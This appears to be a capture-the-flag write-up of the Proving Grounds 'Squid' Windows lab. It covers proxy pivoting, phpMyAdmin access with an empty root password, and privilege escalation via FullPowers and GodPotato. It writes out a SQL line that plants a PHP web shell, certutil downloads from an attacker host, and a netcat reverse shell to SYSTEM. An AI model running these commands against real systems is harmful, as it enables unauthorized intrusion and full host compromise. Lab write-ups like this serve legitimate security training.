Squid
Source: Proving Grounds OS: Windows Community Rating: Hard
Enumeration & Reconnaissance
Again, autorecon bombarded me with open ports: 135, 139, 445, 3128, 49666, 49667
Port HTTP (3128) was running Squid, which turned out to be a proxy. After some (loads and loads of) searching, I found a CVE but no working PoC. Instead, Haktricks pointed me to
spose.py
, a Squid pivoting scanner. Running it revealed two additional open ports: 3306 and 8080.


Gaining Initial Access
To interact with them, I configured my browser proxy and started investigating.

3306 was a MySQL service that just downloaded a dummy file.
8080 was where things got interesting, phpMyAdmin was exposed!
Tried
root
with an empty password, and it worked. After checking the tables, nothing valuable popped up, so I decided to upload a shell using SQL.

First, I needed the web root directory.
phpinfo()
check came in handy and gave me the path. Now, I could upload my shell:
select '<?php system($_GET["cmd"]); ?>;' into outfile 'C:/wamp/www/shell.php';

With that, I now had a web shell. Time to get a full reverse shell:
http://192.168.155.189:8080/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.45.240%3A901%2Fshell.php
http://192.168.155.189:8080/shell.php?cmd=.%2Fshell.php

Privilege Escalation
After getting a foothold, I checked user privileges, uploaded
WinPeas
, and looked around, but nothing obvious stood out. Then after searching online, I found a trick that lets Service accounts regain their old privileges.Downloaded and ran the PoC,
FullPowers.exe
, which enabled SeImpersonatePrivilege alongside other privileges.

With this, I could use GodPotato to escalate to SYSTEM:
certutil -urlcache -split -f http://192.168.45.240:901/GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.240:901/nc.exe
.\GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.240 9100"
And just like that, I was SYSTEM.

Lessons Learned
Default creds still work in 2024.
Sometimes, searching for a working PoC is a waste of time, pivoting to alternative tools (like
spose.py
) can be faster.phpMyAdmin + empty root password = instant win. Upload a web shell right away!
Web shells are still one of the easiest ways to pivot into a full reverse shell.
When you get a service account with limited privileges, service account privilege restoration can be a path to explore.
Last updated